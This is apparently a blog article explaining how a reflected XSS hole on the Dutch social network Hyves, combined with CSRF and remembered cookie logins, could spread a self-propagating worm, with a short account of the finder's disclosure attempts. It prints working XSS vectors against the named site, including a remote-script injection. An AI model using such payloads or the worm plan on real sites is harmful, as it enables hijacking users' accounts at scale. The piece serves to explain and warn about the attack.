Launching XSS CSRF Based Worms On Social Networks.

Publicated on : 1202050354
For those who didn't know it yet, XSS is just bad. But it can be far worse. Usually if not always, many have the firm idea that XSS worms needs to be stored XSS worms instead of reflected XSS worms. This might hold some water, because it contributes to it's persistence. But it isn't necessary. in this article I want to explain why a stored XSS hole isn't mandatory, and that reflected XSS can perform worm like behavior due to the use of CSRF. CSRF is a great way of mixing up or leverage the social engineering part. We as an attacker don't necessarily need to engineer all users to click on a link that looks quite murky. It is possible to let victims infect their own friends. This way, the social engineering is far more likely to succeed. CSRF can help us achieve that goal, to propagate a reflected XSS worm we only have to trick only one person. The rest happens automatically.

Last week a reader named Bart Kerkvliet contacted me about a XSS hole he found in the online social network site called Hyves. Hyves is a very popular website in my country. They have millions of active users including our national president. Bart told me about the XSS vulnerability, and that he contacted Hyves to notify them about the issue. Hyves didn't respond adequately, and he tried again. After some time they decided to fix it. Bart then went back and tried again, and sure they didn't fix it properly. It was still possible to inject Javascript into different search fields. Obviously, it wasn't fixed. Hyves also said that it wasn't that bad after all. They do filter for single and double quotes, so who cares, you can't do anything malicious right? Wrong.

Bart supplied these vectors to test:
Direct link:
http://www.hyves.nl/index.php?l1=ut&l2=sr&l3=ti&searchterms=%3Cscript%3Ealert%28%2FXSS%2F%29%3B%3C%2Fscript%3E
Or go to: http://www.hyves.nl/search/tips/
and supply: <script>alert(/XSS/);</script>
We can also submit remote Javascript:
"><script src=server.com/somejs.js></script>
It is possible to inject remote Javascript files. The issue arising with remote Javascript is that it becomes part of the full DOM of the page it was injected. Thus, it can perform anything that stored Javascript can perform, which makes reflected XSS a big issue. While there is some limitation on the persistence of the actual worm, we can infect as many users that we want. Theoretically it can grow as large as a stored worm with some luck. And this article just does that, we are going to use CSRF to trick users into infect their own social network profile. Hyves has the unfortunate problem that it also uses cookie authentication that can be set to remembered by the browser. This helps us to fully automate the attack. Moreover, they make royal use of Ajax. Many actions on Hyves